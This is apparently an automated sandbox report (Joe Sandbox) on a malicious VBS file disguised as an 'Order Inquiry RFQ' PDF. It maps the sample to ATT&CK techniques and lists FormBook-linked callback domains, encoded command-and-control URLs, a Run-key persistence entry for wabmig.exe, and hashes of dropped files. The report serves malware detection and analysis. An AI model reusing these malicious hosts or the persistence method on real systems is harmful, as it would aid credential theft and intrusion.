          Source: Yara match File source: 0000000A.00000002.2447450866.0000000022690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000A.00000002.2446978661.00000000216E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | 321 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 321 Scripting | 1 Abuse Elevation Control Mechanism | 11 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 114 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | 21 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 412 Process Injection | 4 Obfuscated Files or Information | Security Account Manager | 221 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | 1 Registry Run Keys / Startup Folder | 1 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 412 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          [Behavior graph. Behavior Graph ID: 1511860; Sample: Order Inquiry RFQ #278823_pdf.vbs; Startdate: 16/09/2024; Architecture: WINDOWS; Score: 100]

          Source | Detection | Scanner | Label | Link
          Order Inquiry RFQ #278823_pdf.vbs | 5% | ReversingLabs | |
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          www.hsck520.com | 5% | Virustotal | | Browse
          lotlizard.host | 1% | Virustotal | | Browse
          www.freel2charger.com | 0% | Virustotal | | Browse
          drive.google.com | 0% | Virustotal | | Browse
          www.amkmos.online | 10% | Virustotal | | Browse
          www.lotlizard.host | 1% | Virustotal | | Browse
          drive.usercontent.google.com | 1% | Virustotal | | Browse
          Source | Detection | Scanner | Label | Link
          http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
          http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
          https://contoso.com/License | 0% | URL Reputation | safe |
          https://contoso.com/Icon | 0% | URL Reputation | safe |
          https://contoso.com/ | 0% | URL Reputation | safe |
          https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
          https://aka.ms/pscore68 | 0% | URL Reputation | safe |
          https://apis.google.com | 0% | URL Reputation | safe |
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
          http://drive.usercontent.google.com | 0% | Avira URL Cloud | safe |
          http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe |
          https://go.micro | 0% | Avira URL Cloud | safe |
          http://www.lotlizard.host/alsy/?7JP=sFIZ3H46VDCFAxrc+oKxfEwJKwyB2GbujsubN54cMZ3ZKYO7DzbSb11HbeOZoAajDYdufGPs+3X3MuSwdoj2w4DFbeRQQ/e5pVDNloXMU4Bz0KAn7Ijiyww=&yD74=KV788dEH1 | 0% | Avira URL Cloud | safe |
          http://www.hsck520.com/hfh5/ | 0% | Avira URL Cloud | safe |
          http://www.microsoft.co | 0% | Avira URL Cloud | safe |
          https://drive.usercontent.google.com/$ | 0% | Avira URL Cloud | safe |
          https://drive.usercontent.google.com/ | 0% | Avira URL Cloud | safe |
          https://drive.googP | 0% | Avira URL Cloud | safe |
          https://drive.usercontent.googh: | 0% | Avira URL Cloud | safe |
          http://drive.google.com | 0% | Avira URL Cloud | safe |
          https://drive.usercontent.google.com/P | 0% | Avira URL Cloud | safe |
          http://www.freel2charger.com/43cj/?yD74=KV788dEH1&7JP=T5xbhsi5FuhzvTEQw2+KT2FsHNx9t47tozcKf+wmva0DEtOyEm69qyqfdc34c7IFdYZ32FzEk2z+82aLMtRHRH5540be2ISaKbwCt+kNSrDfOHoX6kdHk1g= | 0% | Avira URL Cloud | safe |
          https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
          https://drive.google.com/C | 0% | Avira URL Cloud | safe |
          https://www.google.com | 0% | Avira URL Cloud | safe |
          https://aka.ms/pscore6lB | 0% | Avira URL Cloud | safe |
          https://drive.google.com/ | 0% | Avira URL Cloud | safe |
          http://www.lotlizard.host/alsy/ | 0% | Avira URL Cloud | safe |
          https://drive.google.com | 0% | Avira URL Cloud | safe |
          https://drive.usercontent.google.com | 0% | Avira URL Cloud | safe |
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.hsck520.com | 35.190.52.58 | true | false | | unknown
          lotlizard.host | 66.29.141.40 | true | false | | unknown
          www.freel2charger.com | 64.98.135.118 | true | false | | unknown
          drive.google.com | 142.250.185.110 | true | false | | unknown
          drive.usercontent.google.com | 142.250.185.193 | true | false | | unknown
          www.amkmos.online | unknown | unknown | true | | unknown
          www.lotlizard.host | unknown | unknown | true | | unknown
          Name | Malicious | Antivirus Detection | Reputation
          http://www.hsck520.com/hfh5/ | false | Avira URL Cloud: safe | unknown
          http://www.lotlizard.host/alsy/?7JP=sFIZ3H46VDCFAxrc+oKxfEwJKwyB2GbujsubN54cMZ3ZKYO7DzbSb11HbeOZoAajDYdufGPs+3X3MuSwdoj2w4DFbeRQQ/e5pVDNloXMU4Bz0KAn7Ijiyww=&yD74=KV788dEH1 | false | Avira URL Cloud: safe | unknown
          http://www.freel2charger.com/43cj/?yD74=KV788dEH1&7JP=T5xbhsi5FuhzvTEQw2+KT2FsHNx9t47tozcKf+wmva0DEtOyEm69qyqfdc34c7IFdYZ32FzEk2z+82aLMtRHRH5540be2ISaKbwCt+kNSrDfOHoX6kdHk1g= | false | Avira URL Cloud: safe | unknown
          http://www.lotlizard.host/alsy/ | false | Avira URL Cloud: safe | unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://drive.usercontent.google.compowershell.exe, 00000001.00000002.2302097105.000001F2A0DC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A11E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DBE000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2302097105.000001F29F346000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2302097105.000001F29F346000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://go.micropowershell.exe, 00000001.00000002.2302097105.000001F29FCEB000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://drive.usercontent.google.com/$wabmig.exe, 0000000A.00000002.2434620654.0000000005E08000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.microsoft.copowershell.exe, 00000006.00000002.2221760380.00000000075A5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://contoso.com/Licensepowershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://contoso.com/Iconpowershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://drive.googPpowershell.exe, 00000001.00000002.2302097105.000001F2A089A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0F0F000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://drive.usercontent.google.com/wabmig.exe, 0000000A.00000002.2434687494.0000000005E71000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://drive.usercontent.googh:powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://drive.google.compowershell.exe, 00000001.00000002.2302097105.000001F2A0F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://drive.usercontent.google.com/Pwabmig.exe, 0000000A.00000002.2434620654.0000000005E08000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2302097105.000001F29F346000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://drive.google.com/Cwabmig.exe, 0000000A.00000002.2434620654.0000000005E08000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.google.compowershell.exe, 00000001.00000002.2302097105.000001F29F59E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5B6000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178528179.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E6A000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.2216604183.00000000048F1000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://drive.google.com/wabmig.exe, 0000000A.00000002.2434620654.0000000005E08000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://contoso.com/powershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://drive.google.compowershell.exe, 00000001.00000002.2302097105.000001F29F5CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A089A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0F0F000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://drive.usercontent.google.compowershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A11E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://aka.ms/pscore68powershell.exe, 00000001.00000002.2302097105.000001F29F121000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://apis.google.compowershell.exe, 00000001.00000002.2302097105.000001F29F59E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5B6000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178528179.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E6A000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2302097105.000001F29F121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2216604183.00000000048F1000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          IP | Domain | Country | ASN | ASN Name | Malicious
          142.250.185.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
          35.190.52.58 | www.hsck520.com | United States | 15169 | GOOGLEUS | false
          142.250.185.110 | drive.google.com | United States | 15169 | GOOGLEUS | false
          64.98.135.118 | www.freel2charger.com | Canada | 32491 | TUCOWS-3CA | false
          66.29.141.40 | lotlizard.host | United States | 19538 | ADVANTAGECOMUS | false
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1511860
          Start date and time:2024-09-16 14:44:05 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 9m 26s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:16
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:2
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:Order Inquiry RFQ #278823_pdf.vbs
          Detection:MAL
          Classification:mal100.troj.spyw.expl.evad.winVBS@20/8@6/5
          EGA Information:
          • Successful, ratio: 40%
          HCA Information:
          • Successful, ratio: 94%
          • Number of executed functions: 133
          • Number of non-executed functions: 273
          Cookbook Comments:
          • Found application associated with file extension: .vbs
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target osqpHpjBCXXA.exe, PID 824 because it is empty
          • Execution Graph export aborted for target powershell.exe, PID 7512 because it is empty
          • Execution Graph export aborted for target powershell.exe, PID 7944 because it is empty
          • Not all processes where analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          Time | Type | Description
          08:45:03 | API Interceptor | 10602x Sleep call for process: powershell.exe modified
          08:46:47 | API Interceptor | 16x Sleep call for process: ktmutil.exe modified
          13:46:17 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run KB60QNXX7JN C:\Program Files (x86)\windows mail\wabmig.exe
          13:46:25 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run KB60QNXX7JN C:\Program Files (x86)\windows mail\wabmig.exe
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          66.29.141.40SHUYOU #U65b0#U6307#U4ee4 PO-2301010 03-07-2024.pdf.exeGet hashmaliciousFormBookBrowse
          • www.lotlizard.host/kyo8/
          Payment.exeGet hashmaliciousFormBookBrowse
          • www.lotlizard.host/nn9z/
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          www.freel2charger.comOrderPI.exeGet hashmaliciousFormBookBrowse
          • 64.98.135.118
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          ADVANTAGECOMUShttps://jcs9p1lk.r.us-east-2.awstrack.me/L0/https:%2F%2Ffenikas.com%2F808994372848913878674621th2sxgen-pgx-624401346368-ifxshipping-isxlatsco.comsf-1MC4w/1/010f0191e4458a77-88cb0572-2458-4d31-b716-cc415eda7b17-000000/NA8iZFGpHvmagHF8-6AAmKi7_8M=176Get hashmaliciousHTMLPhisherBrowse
          • 66.29.141.215
          http://jnhxqc.com/Get hashmaliciousUnknownBrowse
          • 66.29.132.221
          http://jnhxqc.com/Get hashmaliciousUnknownBrowse
          • 66.29.132.221
          https://www.tiktok.com/////link/v2?aid=1988&lang=enwzuw&scene=bio_url&target=google.com.////amp/s/iammyvision.org/99011/098892/amltQHBhdG9icmllbi5jb20=Get hashmaliciousEvilProxy, HTMLPhisherBrowse
          • 66.29.131.166
          https://petpolite.com/de-en/booking/card.phpGet hashmaliciousUnknownBrowse
          • 66.29.146.64
          TF1--90.AE.473- ARCA.exeGet hashmaliciousFormBookBrowse
          • 66.29.149.180
          PJS-4021339 IND.exeGet hashmaliciousFormBookBrowse
          • 66.29.149.180
          220204-TF1--00.exeGet hashmaliciousFormBookBrowse
          • 66.29.149.180
          https://url.au.m.mimecastprotect.com/s/PfBWC4QZ15ukx20VsOfYC4BNEn?domain=incleecl.comGet hashmaliciousUnknownBrowse
          • 66.29.141.225
          20-EM-00- PI-INQ-3001.exeGet hashmaliciousFormBookBrowse
          • 66.29.149.180
          TUCOWS-3CAhttps://qeosys.nl/1/index.html?utm_source=promotions&utm_medium=email&utm_campaign=#ann@virtualintelligencebriefing.comGet hashmaliciousUnknownBrowse
          • 64.98.135.17
          b2bXo6vmDm.exeGet hashmaliciousSystemBCBrowse
          • 64.98.38.4
          file.exeGet hashmaliciousSystemBCBrowse
          • 64.98.38.5
          file.exeGet hashmaliciousSystemBCBrowse
          • 64.98.38.5
          eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
          • 64.98.135.90
          appdrivesound.exeGet hashmaliciousSystemBCBrowse
          • 64.98.38.4
          5CxmQXL0LD.exeGet hashmaliciousSystemBCBrowse
          • 64.98.38.4
          http://lexew97591vreaa.pages.dev/Get hashmaliciousHTMLPhisherBrowse
          • 64.98.38.203
          205.185.124.50-x86-2024-07-03T23_47_55.elfGet hashmaliciousMirai, MoobotBrowse
          • 64.98.180.3
          yq5xNPpWCT.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
          • 64.98.36.4
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          3b5074b1b5d032e5620f69f9f700ff0ehttps://hachidori87.com/wp-content/Magenta/MagentaGet hashmaliciousPhisherBrowse
          • 142.250.185.193
          • 142.250.185.110
          https://linkin.bio/sibiliaGet hashmaliciousHTMLPhisherBrowse
          • 142.250.185.193
          • 142.250.185.110
          Quotation QT-433.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
          • 142.250.185.193
          • 142.250.185.110
          Shipping Document.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
          • 142.250.185.193
          • 142.250.185.110
          SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeGet hashmaliciousUnknownBrowse
          • 142.250.185.193
          • 142.250.185.110
          OTPAuthenticator.wsfGet hashmaliciousAsyncRATBrowse
          • 142.250.185.193
          • 142.250.185.110
          Documenti di spedizione 00039488580006996960.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
          • 142.250.185.193
          • 142.250.185.110
          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDDtrigyycT&sa=t&esrc=DtrigFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJFpgpgNlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fs%C2%ADq%C2%ADt%C2%ADem%C2%ADpl%C2%ADo%C2%AD.%C2%ADc%C2%ADl//wp-includes/pomo/.dev//hji6ufuo/Z2lhY29tb2dpb3JnaW8uY2VudHJpdHRvQG1wcy5pdA===$%E3%80%82&data=05%7C02%7Cgiacomogiorgio.centritto@mps.it%7C7c1a2223a79d4fd6fd7a08dcd51521b8%7C402b15a57cb94d1b85a349542f8bd230%7C0%7C0%7C638619533982563608%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=eMy46hqDEiP5rHA2M0xAW5wG1Dj23+pTKoHkIPweAEc=&reserved=0Get hashmaliciousHTMLPhisherBrowse
          • 142.250.185.193
          • 142.250.185.110
          September PO.exeGet hashmaliciousAgentTeslaBrowse
          • 142.250.185.193
          • 142.250.185.110
          TT USD 170,196 - 16.9.2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
          • 142.250.185.193
          • 142.250.185.110
          37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousVidarBrowse
          • 142.250.185.193
          • 142.250.185.110
          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
          • 142.250.185.193
          • 142.250.185.110
          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
          • 142.250.185.193
          • 142.250.185.110
          SecuriteInfo.com.Trojan.DownLoader47.29560.1466.27356.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
          • 142.250.185.193
          • 142.250.185.110
          Est_US091024A - PICTURE.exeGet hashmaliciousAzorult, GuLoaderBrowse
          • 142.250.185.193
          • 142.250.185.110
          SwiftMesaj.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
          • 142.250.185.193
          • 142.250.185.110
          rfq_last_quater_product_purchase_order_import_list_16_06_2024_000000160924.bat.exeGet hashmaliciousRemcosBrowse
          • 142.250.185.193
          • 142.250.185.110
          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
          • 142.250.185.193
          • 142.250.185.110
          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
          • 142.250.185.193
          • 142.250.185.110
          UzOiLxrF4d.exeGet hashmaliciousAmadey, NeoreklamiBrowse
          • 142.250.185.193
          • 142.250.185.110
          No context
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:modified
          Size (bytes):11608
          Entropy (8bit):4.8908305915084105
          Encrypted:false
          SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
          MD5:FE1902820A1CE8BD18FD85043C4D9C5C
          SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
          SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
          SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
          Malicious:false
          Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):64
          Entropy (8bit):1.1940658735648508
          Encrypted:false
          SSDEEP:3:Nlllulbnolz:NllUc
          MD5:F23953D4A58E404FCB67ADD0C45EB27A
          SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
          SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
          SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
          Malicious:false
          Preview:@...e................................................@..........
          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\SysWOW64\ktmutil.exe
          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
          Category:dropped
          Size (bytes):114688
          Entropy (8bit):0.9746603542602881
          Encrypted:false
